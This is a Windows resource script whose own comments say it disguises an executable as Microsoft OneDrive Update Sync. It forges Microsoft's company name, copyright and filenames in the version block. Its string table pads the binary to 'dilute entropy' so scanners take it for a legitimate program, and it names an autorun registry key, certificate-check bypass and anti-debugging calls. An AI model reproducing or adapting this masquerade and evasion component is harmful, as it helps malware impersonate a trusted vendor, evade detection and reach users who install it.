#include <windows.h>

// Version info disguised as Microsoft OneDrive Update Sync (OneDriveUpdateSync.exe v24.201.1007.0005)
// STRINGTABLE below dilutes entropy to the 4.5-6.5 range of legitimate Win32 binaries.

VS_VERSION_INFO VERSIONINFO
 FILEVERSION    24,201,1007,5
 PRODUCTVERSION 24,201,1007,5
 FILEFLAGSMASK  VS_FFI_FILEFLAGSMASK
 FILEFLAGS      0x0L
 FILEOS         VOS__WINDOWS32
 FILETYPE       VFT_APP
 FILESUBTYPE    VFT2_UNKNOWN
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "040904B0"
        BEGIN
            VALUE "CompanyName",      "Microsoft Corporation\0"
            VALUE "FileDescription",  "Microsoft OneDrive Update Sync\0"
            VALUE "FileVersion",      "24.201.1007.0005\0"
            VALUE "InternalName",     "OneDriveUpdateSync\0"
            VALUE "LegalCopyright",   "\xa9 Microsoft Corporation. All rights reserved.\0"
            VALUE "OriginalFilename", "OneDriveUpdateSync.exe\0"
            VALUE "ProductName",      "Microsoft OneDrive\0"
            VALUE "ProductVersion",   "24.201.1007.0005\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x0409, 1200
    END
END

STRINGTABLE
BEGIN
    1000 "Microsoft.OneDrive.UpdateSync"
    1001 "OneDrive.exe"
    1002 "HKLM\\SOFTWARE\\Microsoft\\OneDrive"
    1003 "Version"
    1004 "UpdateRing"
    1005 "SilentBusinessConfigCompleted"
    1006 "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
    1007 "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
    1008 "SystemRoot"
    1009 "ProgramFiles"
    1010 "CommonProgramFiles"
    1011 "USERPROFILE"
    1012 "APPDATA"
    1013 "LOCALAPPDATA"
    1014 "TEMP"
    1015 "Content-Type: application/json"
    1016 "Content-Type: text/xml; charset=utf-8"
    1017 "X-Ms-Diagnostics"
    1018 "Microsoft-Office-Telemetry"
    1019 "User-Agent: Microsoft Office/16.0"
    1020 "Authorization: Bearer"
    1021 "WinHttpOpen"
    1022 "WinHttpConnect"
    1023 "WinHttpOpenRequest"
    1024 "WinHttpSendRequest"
    1025 "WinHttpReceiveResponse"
    1026 "WinHttpReadData"
    1027 "WinHttpCloseHandle"
    1028 "WinHttpSetOption"
    1029 "WinHttpQueryHeaders"
    1030 "SECURITY_FLAG_IGNORE_UNKNOWN_CA"
    1031 "RegOpenKeyExW"
    1032 "RegCreateKeyExW"
    1033 "RegSetValueExW"
    1034 "RegQueryValueExW"
    1035 "RegCloseKey"
    1036 "RegDeleteKeyW"
    1037 "RegDeleteValueW"
    1038 "RegEnumKeyExW"
    1039 "RegEnumValueW"
    1040 "RegFlushKey"
    1041 "CreateFileW"
    1042 "ReadFile"
    1043 "WriteFile"
    1044 "CloseHandle"
    1045 "GetFileSize"
    1046 "SetFilePointer"
    1047 "DeleteFileW"
    1048 "CopyFileW"
    1049 "MoveFileExW"
    1050 "GetTempPathW"
    1051 "GetTempFileNameW"
    1052 "CreateDirectoryW"
    1053 "RemoveDirectoryW"
    1054 "GetFileAttributesW"
    1055 "SetFileAttributesW"
    1056 "FindFirstFileW"
    1057 "FindNextFileW"
    1058 "FindClose"
    1059 "GetModuleFileNameW"
    1060 "GetModuleHandleW"
    1061 "LoadLibraryW"
    1062 "FreeLibrary"
    1063 "GetProcAddress"
    1064 "VirtualAlloc"
    1065 "VirtualFree"
    1066 "VirtualProtect"
    1067 "HeapAlloc"
    1068 "HeapFree"
    1069 "HeapReAlloc"
    1070 "GlobalAlloc"
    1071 "GlobalFree"
    1072 "LocalAlloc"
    1073 "LocalFree"
    1074 "GetSystemInfo"
    1075 "GetVersionExW"
    1076 "GetComputerNameW"
    1077 "GetUserNameW"
    1078 "GetCurrentProcess"
    1079 "GetCurrentThread"
    1080 "GetCurrentProcessId"
    1081 "GetCurrentThreadId"
    1082 "OpenProcess"
    1083 "TerminateProcess"
    1084 "CreateThread"
    1085 "WaitForSingleObject"
    1086 "WaitForMultipleObjects"
    1087 "Sleep"
    1088 "SleepEx"
    1089 "SetEvent"
    1090 "ResetEvent"
    1091 "CreateEventW"
    1092 "CreateMutexW"
    1093 "ReleaseMutex"
    1094 "CreateSemaphoreW"
    1095 "ReleaseSemaphore"
    1096 "InitializeCriticalSection"
    1097 "EnterCriticalSection"
    1098 "LeaveCriticalSection"
    1099 "DeleteCriticalSection"
    1100 "TlsAlloc"
    1101 "TlsGetValue"
    1102 "TlsSetValue"
    1103 "TlsFree"
    1104 "GetLastError"
    1105 "SetLastError"
    1106 "FormatMessageW"
    1107 "OutputDebugStringW"
    1108 "IsDebuggerPresent"
    1109 "CheckRemoteDebuggerPresent"
    1110 "GetSystemTime"
    1111 "GetLocalTime"
    1112 "GetSystemTimeAsFileTime"
    1113 "SystemTimeToFileTime"
    1114 "FileTimeToSystemTime"
    1115 "CompareFileTime"
    1116 "GetTickCount"
    1117 "GetTickCount64"
    1118 "QueryPerformanceCounter"
    1119 "QueryPerformanceFrequency"
    1120 "MultiByteToWideChar"
    1121 "WideCharToMultiByte"
    1122 "lstrcmpiW"
    1123 "lstrcpyW"
    1124 "lstrcatW"
    1125 "lstrlenW"
    1126 "wsprintfW"
    1127 "wvsprintfW"
    1128 "ShellExecuteW"
    1129 "SHGetFolderPathW"
    1130 "SHCreateDirectoryExW"
    1131 "PathFileExistsW"
    1132 "PathCombineW"
    1133 "PathAppendW"
    1134 "PathStripPathW"
    1135 "PathRemoveFileSpecW"
    1136 "PathAddExtensionW"
    1137 "PathRemoveExtensionW"
    1138 "CoInitializeEx"
    1139 "CoCreateInstance"
    1140 "CoUninitialize"
    1141 "SysAllocString"
    1142 "SysFreeString"
    1143 "VariantInit"
    1144 "VariantClear"
    1145 "SafeArrayCreate"
    1146 "SafeArrayDestroy"
    1147 "SafeArrayGetElement"
    1148 "SafeArrayPutElement"
    1149 "IUnknown_Release"
    1150 "IDispatch_Invoke"
END
